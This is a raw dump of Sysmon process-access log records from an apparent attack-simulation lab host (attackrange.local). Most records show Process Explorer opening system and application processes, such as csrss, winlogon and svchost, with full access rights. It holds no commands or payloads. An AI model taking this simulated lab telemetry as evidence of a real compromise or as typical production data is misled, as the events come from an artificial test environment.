Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000785611Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.705{732C744F-151A-600B-0D00-00000000A301}6245712C:\Windows\system32\svchost.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785610Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785609Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785608Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785607Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785606Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785605Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785604Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785603Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785602Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785601Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785600Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785599Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785598Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785597Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785596Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785595Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785594Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785593Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785592Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785591Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785590Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785589Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785588Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785587Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785586Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785585Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785584Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785583Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785582Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785581Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785580Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785579Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785578Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785577Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785576Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785575Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 